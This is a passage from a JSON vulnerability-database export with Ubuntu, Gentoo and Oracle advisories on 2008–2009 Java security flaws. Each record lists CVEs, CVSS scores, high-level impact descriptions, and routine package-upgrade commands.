\nIf a user were tricked into running a malicious applet, a remote attacker \ncould gain user privileges, or list directory contents. (CVE-2008-5347, \nCVE-2008-5350)\n\nIt was discovered that Kerberos authentication and RSA public key \nprocessing were not correctly handled in Java. A remote attacker \ncould exploit these flaws to cause a denial of service. (CVE-2008-5348, \nCVE-2008-5349)\n\nIt was discovered that Java accepted UTF-8 encodings that might be \nhandled incorrectly by certain applications. A remote attacker could \nbypass string filters, possibly leading to other exploits. (CVE-2008-5351)\n\nOverflows were discovered in Java JAR processing. If a user or \nautomated system were tricked into processing a malicious JAR file, \na remote attacker could crash the application, leading to a denial of \nservice. (CVE-2008-5352, CVE-2008-5354)\n\nIt was discovered that Java calendar objects were not unserialized safely. \nIf a user or automated system were tricked into processing a specially \ncrafted calendar object, a remote attacker could execute arbitrary code \nwith user privileges. (CVE-2008-5353)\n\nIt was discovered that the Java image handling code could lead to memory \ncorruption. If a user or automated system were tricked into processing \na specially crafted image, a remote attacker could crash the application, \nleading to a denial of service. (CVE-2008-5358, CVE-2008-5359)\n\nIt was discovered that temporary files created by Java had predictable \nnames. If a user or automated system were tricked into processing a \nspecially crafted JAR file, a remote attacker could overwrite sensitive \ninformation. 
(CVE-2008-5360)", "edition": 5, "modified": "2009-01-27T00:00:00", "published": "2009-01-27T00:00:00", "id": "USN-713-1", "href": "https://ubuntu.com/security/notices/USN-713-1", "title": "openjdk-6 vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:04", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2009-1095", "CVE-2009-1093", "CVE-2009-1104", "CVE-2008-5346", "CVE-2008-3105", "CVE-2009-3880", "CVE-2009-1096", "CVE-2009-2670", "CVE-2009-2476", "CVE-2008-5339", "CVE-2009-1099", "CVE-2009-2716", "CVE-2009-1097", "CVE-2009-3728", "CVE-2009-2689", "CVE-2008-3103", "CVE-2009-2690", "CVE-2008-5341", "CVE-2009-2723", "CVE-2009-2718", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2009-2409", "CVE-2009-2722", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-3115", "CVE-2008-5358", "CVE-2009-2720", "CVE-2008-3112", "CVE-2008-3104", "CVE-2008-3106", "CVE-2009-2673", "CVE-2009-1100", "CVE-2009-3883", "CVE-2008-5342", "CVE-2009-3876", "CVE-2008-3111", "CVE-2008-5353", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-1098", "CVE-2008-3108", "CVE-2009-1094", "CVE-2009-3729", "CVE-2009-3879", "CVE-2009-3881", "CVE-2008-3113", "CVE-2008-3110", "CVE-2009-2674", "CVE-2008-3114", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-1106", "CVE-2008-5350", "CVE-2009-3869", "CVE-2009-1103", "CVE-2008-3109", "CVE-2008-5345", "CVE-2008-5347", "CVE-2009-2724", "CVE-2009-3874", "CVE-2008-5354", "CVE-2008-3107", "CVE-2009-1101", "CVE-2009-3886", "CVE-2009-3871", "CVE-2009-2475", "CVE-2009-3865", "CVE-2009-1107", "CVE-2009-2671", "CVE-2009-3877", "CVE-2009-1102", "CVE-2008-5351", "CVE-2009-2672", "CVE-2009-2719", "CVE-2009-3884", "CVE-2009-3868", "CVE-2009-2676", "CVE-2009-1105", "CVE-2009-2721", "CVE-2009-2675"], "description": "### Background\n\nThe Sun Java 
Development Kit (JDK) and the Sun Java Runtime Environment (JRE) provide the Sun Java platform. \n\n### Description\n\nMultiple vulnerabilities have been reported in the Sun Java implementation. Please review the CVE identifiers referenced below and the associated Sun Alerts for details. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted JAR archive, applet, or Java Web Start application, possibly resulting in the execution of arbitrary code with the privileges of the user running the application. Furthermore, a remote attacker could cause a Denial of Service affecting multiple services via several vectors, disclose information and memory contents, write or execute local files, conduct session hijacking attacks via GIFAR files, steal cookies, bypass the same-origin policy, load untrusted JAR files, establish network connections to arbitrary hosts and posts via several vectors, modify the list of supported graphics configurations, bypass HMAC-based authentication systems, escalate privileges via several vectors and cause applet code to be executed with older, possibly vulnerable versions of the JRE. \n\nNOTE: Some vulnerabilities require a trusted environment, user interaction, a DNS Man-in-the-Middle or Cross-Site-Scripting attack. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll Sun JRE 1.5.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/sun-jre-bin-1.5.0.22\"\n\nAll Sun JRE 1.6.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/sun-jre-bin-1.6.0.17\"\n\nAll Sun JDK 1.5.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/sun-jdk-1.5.0.22\"\n\nAll Sun JDK 1.6.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/sun-jdk-1.6.0.17\"\n\nAll users of the precompiled 32bit Sun JRE 1.5.x should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/emul-linux-x86-java-1.5.0.22\"\n\nAll users of the precompiled 32bit Sun JRE 1.6.x should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/emul-linux-x86-java-1.6.0.17\"\n\nAll Sun JRE 1.4.x, Sun JDK 1.4.x, Blackdown JRE, Blackdown JDK and precompiled 32bit Sun JRE 1.4.x users are strongly advised to unmerge Java 1.4: \n \n \n # emerge --unmerge =app-emulation/emul-linux-x86-java-1.4*\n # emerge --unmerge =dev-java/sun-jre-bin-1.4*\n # emerge --unmerge =dev-java/sun-jdk-1.4*\n # emerge --unmerge dev-java/blackdown-jdk\n # emerge --unmerge dev-java/blackdown-jre\n\nGentoo is ceasing support for the 1.4 generation of the Sun Java Platform in accordance with upstream. 
All 1.4 JRE and JDK versions are masked and will be removed shortly.", "edition": 1, "modified": "2009-11-17T00:00:00", "published": "2009-11-17T00:00:00", "id": "GLSA-200911-02", "href": "https://security.gentoo.org/glsa/200911-02", "type": "gentoo", "title": "Sun JDK/JRE: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2019-05-29T18:20:49", "bulletinFamily": "software", "cvelist": ["CVE-2009-0996", "CVE-2009-1004", "CVE-2009-0995", "CVE-2009-0992", "CVE-2009-1010", "CVE-2009-0999", "CVE-2009-0978", "CVE-2009-0981", "CVE-2009-1003", "CVE-2009-0997", "CVE-2008-5359", "CVE-2008-5349", "CVE-2009-1016", "CVE-2009-0983", "CVE-2008-5352", "CVE-2009-0986", "CVE-2008-5348", "CVE-2009-0977", "CVE-2008-5357", "CVE-2008-5360", "CVE-2009-1013", "CVE-2008-5356", "CVE-2008-5358", "CVE-2009-0982", "CVE-2009-1006", "CVE-2009-0989", "CVE-2009-1017", "CVE-2009-0984", "CVE-2009-0991", "CVE-2009-1011", "CVE-2009-0998", "CVE-2008-5353", "CVE-2009-0988", "CVE-2009-1000", "CVE-2009-1014", "CVE-2009-0976", "CVE-2008-5350", "CVE-2009-0993", "CVE-2009-1002", "CVE-2009-1012", "CVE-2008-5345", "CVE-2009-1005", "CVE-2008-5347", "CVE-2008-5354", "CVE-2009-0979", "CVE-2009-0994", "CVE-2009-1001", "CVE-2009-0975", "CVE-2009-1009", "CVE-2009-0985", "CVE-2009-0980", "CVE-2009-0973", "CVE-2009-0990", "CVE-2008-5351", "CVE-2009-1008", "CVE-2009-0974", "CVE-2009-0972"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. 
Please refer to\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible.** This Critical Patch Update contains 43 new security fixes across all products.\n", "modified": "2009-09-03T00:00:00", "published": "2009-04-14T00:00:00", "id": "ORACLE:CPUAPR2009-099563", "href": "", "type": "oracle", "title": "cpuapr2009.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}